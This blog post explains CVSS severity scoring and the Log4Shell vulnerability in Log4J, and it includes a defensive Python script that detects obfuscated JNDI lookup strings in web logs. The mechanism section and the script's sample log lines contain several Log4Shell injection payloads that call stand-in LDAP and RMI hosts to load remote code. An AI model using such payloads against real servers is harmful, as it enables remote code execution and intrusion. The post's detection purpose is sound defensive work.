What the 10 means on a CVSS score and why Log4J was such a big deal
Posted 14 Feb at 6:26 am in Productivity
[6 min read]
What is the CVSS?
The Common Vulnerability Scoring System (CVSS) is a scoring scale maintained by the CVSS Special Interest Group at FIRST to rank vulnerabilities by severity. The criteria that give a vulnerability its base score are grouped under two umbrella categories.
Exploitability metrics gauge how easy a vulnerability is to exploit, and impact metrics measure what is lost when it is exploited, expressed in terms of the CIA triad: confidentiality, integrity, and availability.
In CVSS version 3.1 (the current version when this was written), the base metrics and their groups are:
Exploitability metrics:
- Attack Vector
- Attack Complexity
- Privileges Required
- User Interaction
Scope (whether a successful exploit affects resources beyond the vulnerable component)
Impact metrics:
- Confidentiality
- Integrity
- Availability
What does a CVSS score of 10 mean?
To make communicating the severity of vulnerabilities to less-technical people more straightforward, the CVSS groups the scored vulnerabilities into different brackets.
CVSS Score Qualitative Ratings:
0.0 – No severity
0.1 – 3.9 – Low severity
4.0 – 6.9 – Medium severity
7.0 – 8.9 – High severity
9.0 – 10.0 – Critical severity
Several other factors can modify a CVSS score, such as the vulnerability's exploit code maturity, remediation level, and report confidence. These are the Temporal metrics, and they can only lower a base score, never raise it. With Scope Unchanged, the highest base score a vulnerability can reach is 9.8 (network-reachable, low complexity, no privileges, no user interaction, High impact on all three of confidentiality, integrity and availability), which is why 9.8 rather than 10.0 is the usual ceiling even for a remotely exploitable, unauthenticated flaw.
Overall, around 14% of vulnerabilities have CVSS 9.8, and only a minute fraction rank CVSS 10.0. A 9.8 already means every exploitability metric is at its worst value and the impact on confidentiality, integrity and availability is High across the board; the only thing it still says is that the damage stays within the vulnerable component.
The only way for a vulnerability to reach 10.0 is for the Scope metric to be Changed: exploiting the component lets the attacker affect resources governed by a different security authority, such as a guest-to-host escape in a hypervisor, or a library flaw that hands over the whole process and the host it runs on. Scope Changed raises the impact sub-score and multiplies the combined score by 1.08, which is what pushes a fully exploitable, fully damaging vulnerability across the line to 10.0.
A 10.0 is therefore not a statement about how hard the flaw is to find or analyze; if anything it is the reverse. The attack is reachable over the network, needs no credentials, no user interaction and no special conditions, and its effects spill past the component that contains the bug, which is what makes such a vulnerability so hard to contain once it becomes public.
Once organizations identify operationally critical threats, they can conduct vulnerability evaluations to prioritize and patch the issue. While there are dozens of types of vulnerabilities in network security, most of them have a severity level of 1.0 to 5.0.
What was Log4J?
The Log4J vulnerability, nicknamed Log4Shell and tracked as CVE-2021-44228, set the internet on fire. Log4J itself is Apache's widely used logging library for Java; the flaw lived inside it. Throughout 2021 we saw handfuls of head-turning cyber attacks and vulnerabilities, and Log4Shell was arguably the largest and most impactful one of the year.
While cybercriminals rushed to exploit it, they kept thousands of security professionals and developers hustling, trying to work out how many products and users were affected, how to stop it, and how to patch it.
How did Log4J start?
Minecraft, one of the largest video games on the market, lies at the beginning of the public history of Log4Shell. The game amasses over 141 million players per year, and some of them discovered that a crafted string pasted into the in-game chat, which servers and clients dutifully logged, let them run code on servers and on other players' computers.
Minecraft's developers quickly patched their game, but Log4J is the default logging library in a huge share of Java software, and Java is almost everywhere. Soon the same flaw was confirmed in products and services from Amazon, Apple's iCloud, Cisco, Tesla, Twitter and many others.
The mechanism was a Log4J 2 feature called message lookups. When a logged string contained a pattern such as ${jndi:ldap://attacker.example/x}, the library did not simply write it to the log; it resolved it, performing a JNDI lookup against the server named in the string and loading whatever Java class that server returned. Anything an attacker could get logged, whether a username, a chat message or an HTTP User-Agent header, therefore became a path to remote code execution. The underlying ability of JNDI to fetch and instantiate classes from a remote server is a long-criticized Java design choice, which is why security professionals point to it as the root of the problem.
Pair that flaw with companies relying heavily on Log4J while lacking any complete inventory of where it was used, and Log4Shell gave cybercriminals the perfect opportunity to wreak havoc.
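Because the payload was just a string, the first question for most teams was whether anyone had already tried it against them. The following is an added example, not code from the Log4J project or from this post's author, of scanning web access logs for JNDI lookup strings, including the obfuscated forms attackers used to slip past naive pattern matching (nested ${lower:...}, ${upper:...} and ${...:-default} lookups). It mirrors how Log4J resolves nested lookups innermost-first, so that ${${lower:j}ndi:...} normalizes to ${jndi:...} before the check runs. The log lines are constructed for this example, using addresses from the 203.0.113.0/24 documentation range, and the function names are my own.

```python
import re

# Innermost ${...} lookup: the body contains no further '$', '{' or '}'.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _resolve(match):
    """Resolve one innermost Log4j-style lookup, imitating the library's own rules."""
    text, body = match.group(0), match.group(1)
    varname, has_default, default = body.partition(":-")   # ${var:-default}
    prefix, _, rest = varname.partition(":")
    prefix = prefix.lower()
    if prefix == "jndi":
        return text               # this is the payload we are hunting for: keep it intact
    if prefix == "lower":
        return rest.lower()       # ${lower:J} -> j
    if prefix == "upper":
        return rest.upper()       # ${upper:j} -> J
    if has_default:
        return default            # ${::-j}, ${env:NOPE:-j} -> j (lookup fails, default wins)
    return text                   # env/sys/date etc. without a default: Log4j leaves it literal


def normalize_lookups(text, max_rounds=20):
    """Collapse nested lookups innermost-first until nothing changes (bounded for safety)."""
    for _ in range(max_rounds):
        resolved = _LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def is_jndi_probe(text):
    """True if the string, once de-obfuscated, carries a JNDI lookup."""
    return "${jndi:" in normalize_lookups(text).lower()


def scan_log_lines(lines):
    """Return (line_number, normalized_line) for each line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        if "${jndi:" in normalized.lower():
            hits.append((number, normalized))
    return hits


# Constructed sample access-log lines (combined format); the payloads sit in the User-Agent field.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:08:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:08:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:08:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"',
    '203.0.113.13 - - [10/Dec/2021:08:00:04 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.5:1099/b}"',
    '203.0.113.14 - - [10/Dec/2021:08:00:05 +0000] "GET /api HTTP/1.1" 200 512 "-" "${${env:NOTSET:-j}ndi:${upper:ldap}://203.0.113.5:1389/c}"',
    '203.0.113.15 - - [10/Dec/2021:08:00:06 +0000] "GET /health HTTP/1.1" 200 512 "-" "${sys:user.home}"',
]

if __name__ == "__main__":
    for number, normalized in scan_log_lines(SAMPLE_LOG):
        print(f"line {number}: {normalized}")
```

This is a heuristic, not a proof: it handles only the lookup prefixes shown, and a hit means an attempt was logged, not that it succeeded. Confirm by looking for outbound LDAP or RMI connections from the host around the same timestamp, and remember that the payload can arrive in any field the application logs, not just the User-Agent.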
Why was Log4J such a big deal?
With barely a few keystrokes, cybercriminals could waltz into some of the world's largest companies' servers. No password, two-factor authentication or in-server control stood in the way, because the attacker never had to log in: the payload only had to end up in something the application logged. Once in, they could do anything they liked.
Installing ransomware, selling data on the black market, embedding malware hidden in plain sight, harvesting user information, and even targeting individuals working at these companies were all potential outcomes of a single vulnerability.
Netlab reported at least ten different malware families circulating for this vulnerability, and everything from automated botnets to hands-on attackers wanted a piece of it. For technology giants such as Microsoft, Apple, Amazon, and Tesla, patching Log4J was relatively straightforward.
However, countless third-party service providers rely heavily on Log4J, and the businesses that depend on them must hope those providers dedicate the resources to fix the issue. Some barely have the resources to do so, and at the time of writing some sources say that not everyone has fully remediated.
By now you have likely concluded that the Log4J vulnerability scored CVSS 10.0 out of 10.0. Strictly, it earned that score because every base metric sits at its worst value: network attack vector, low complexity, no privileges, no user interaction, High impact on confidentiality, integrity and availability, and, crucially, Scope Changed, since a logging library handed the attacker the entire application and the host underneath it. Its ubiquity is not part of the CVSS formula at all, yet that is what turned a critical score into a global incident, and events like Log4Shell showcase how vital vulnerability mitigation is.
For months, organizations, vendors, and even individuals had Log4J at the top of every priority list. While it was not the most significant vulnerability in the history of computer security, it posed tremendous threats to countless users and high-profile companies.